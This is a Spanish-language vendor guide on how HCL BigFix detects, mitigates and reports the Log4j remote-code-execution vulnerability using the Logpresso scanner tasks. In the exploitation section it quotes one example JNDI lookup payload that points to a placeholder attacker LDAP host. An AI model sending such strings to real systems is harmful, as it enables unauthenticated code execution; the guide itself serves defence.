Guía de HCL BigFix

¿Qué es?

Se trata de una vulnerabilidad descubierta en Apache Log4j, la popular biblioteca Java desarrollada y mantenida por la fundación Apache. La biblioteca Log4j se utiliza ampliamente en muchos productos de software comerciales y de código abierto como rutina de registro de Java. La vulnerabilidad tiene una puntuación de gravedad de 10/10 en el sistema común de puntuación de vulnerabilidades (CVSS) de MITRE.org, lo que indica su gravedad.

¿Cómo se explota?

La vulnerabilidad de Log4j puede explotarse de forma remota por un adversario no autenticado mediante la ejecución remota de código (RCE). Si un atacante envía un mensaje que contiene una cadena como ${jndi:ldap://dirtyLDAP.com/X}), una clase de código externo o la búsqueda de mensajes puede dar como resultado la ejecución de código malicioso SIN autenticación.

¿A quién afecta?

Cientos de millones de dispositivos están en peligro, incluidos los de las administraciones públicas, los comerciales y los domésticos. Además, cada dispositivo afectado puede tener docenas o cientos de lugares donde reside el código vulnerable, ya que el registro es una acción extremadamente común en toda el área de la informática.

¿Cómo puede ayudar HCL BigFix?

El equipo de HCL BigFix está trabajando junto con nuestros clientes, expertos en seguridad y miembros de operaciones de TI para producir contenido de HCL BigFix que le ayude a identificar y corregir las vulnerabilidades de Log4j en su entorno.

HCL BigFix es la herramienta esencial para las operaciones de TI. HCL BigFix automatiza la detección, la gestión y la corrección de todos los puntos finales, ya sean locales, móviles, virtuales o en la nube, independientemente del sistema operativo, la ubicación o la conectividad. Con HCL BigFix Insights for Vulnerability Remediation, que se integra con las principales soluciones de gestión de vulnerabilidades como Tenable, las vulnerabilidades como Log4j pueden corregirse más rápido que con cualquier otra solución del mercado.

Con HCL BigFix puede detectar, mitigar y corregir vulnerabilidades, crear informes previos y posteriores a la corrección, y proteger los puntos finales corregidos.

DESCUBRIMIENTO

HCL BigFix ha desarrollado tareas para ayudar a los usuarios de HCL BigFix a descubrir instancias y vulnerabilidades de Log4j. Utilizamos el escáner Logpresso Log4j porque es un escáner de código abierto basado en Java disponible en GitHub, desarrollado por el equipo técnico de Logpresso y de libre acceso para la comunidad de ciberseguridad

Estas tareas descargan un tiempo de ejecución de Java temporal para ejecutar el análisis y no requieren que Java esté instalado en el sistema. Estas tareas funcionan en Windows 8.1 y posterior (x86 y x64), Mac OS X, Linux (x86, x64, armv71, ppc64, ppc64LE y s390x), AIX 7.1 TL4 y posterior, y Solaris (x86 y SPARC). Con una descarga manual del JRE, las tareas también pueden ejecutarse en HP-UX.

Los cuatro pasos siguientes articulan el proceso general para descubrir e informar sobre la vulnerabilidad:
 

1. Desde el sitio de contenido "BES Inventory and License", ejecute la tarea 602 "Run: log4j2-scan v2.9.2 – Universal JAR – Download JRE – SCAN only".
 

2. Desde el sitio de contenido "BES Inventory and License", active el análisis 601 "log4j2-scan results".
 

3. Cuando se hayan cargado los resultados en el servidor de HCL BigFix, vea los resultados detallados del escáner en el análisis. Consulte la imagen que aparece a continuación.
 

4. Para obtener un informe ejecutivo, use la vista "Log4j Vulnerability Report (Logpresso Scan)" que se proporciona en los informes web de HCL BigFix.

MITIGACIÓN

Antes de que los proveedores de aplicaciones pongan a disposición los parches, hay dos formas de mitigar el riesgo que representa Log4j:

1. 1. Utilice la utilidad Logpresso Log4j-scan para eliminar las clases Java vulnerables de los archivos Log4j-core JAR. La tarea de HCL BigFix para hacerlo está disponible en el sitio de contenido "BES Inventory and License". Se llama Tarea 603 (Run: log4j2-scan v2.9.2 – Universal JAR – Download JRE – WITH REMEDIATION).
La utilidad Logpresso Log4j-scan puede realizar algunas correcciones en las bibliotecas JAR Log4j-Core afectadas, tanto para Log4j 2.x como para Log4j 1.x. La utilidad mitiga la peor parte de las CVE, pero es posible que no mitigue todas las vulnerabilidades basadas en denegación de servicio. No obstante, la utilidad puede ser un paso muy eficaz para proporcionar protección y mantener al mismo tiempo la compatibilidad con las aplicaciones existentes. Para obtener más detalles sobre las medidas específicas de mitigación que puede adoptar la herramienta, visite https://github.com/logpresso/CVE-2021-44228-Scanner.

2. Detenga o desactive las aplicaciones o los servicios afectados.
 

CORRECCIÓN

A medida que los proveedores pongan a disposición los parches, HCL BigFix creará, probará y entregará rápidamente los fixlets de HCL BigFix. Descargue la lista más reciente de fixlets de HCL BigFix que corrigen las vulnerabilidades de Log4j en https://www.hcltechsw.com/bigfix/log4j-ivr.
 

INFORMES

Con BigFix, los informes de los sistemas y bibliotecas afectados pueden visualizarse y archivarse mediante los informes web de HCL BigFix, que muestran el estado de la vulnerabilidad y la mitigación en distintos momentos.
 

PROTECCIÓN

Una vez solucionada la vulnerabilidad, HCL BigFix puede garantizar que no vuelva a aparecer. Con BigFix, puede programar análisis recurrentes utilizando la tarea de detección disponible para que cualquier nuevo sistema o software con la vulnerabilidad Log4j pueda identificarse y remediarse.

Si necesita más ayuda, visite el foro de HCL BigFix,, póngase en contacto con los servicios profesionales de HCL BigFix o póngase en contacto con el soporte técnico.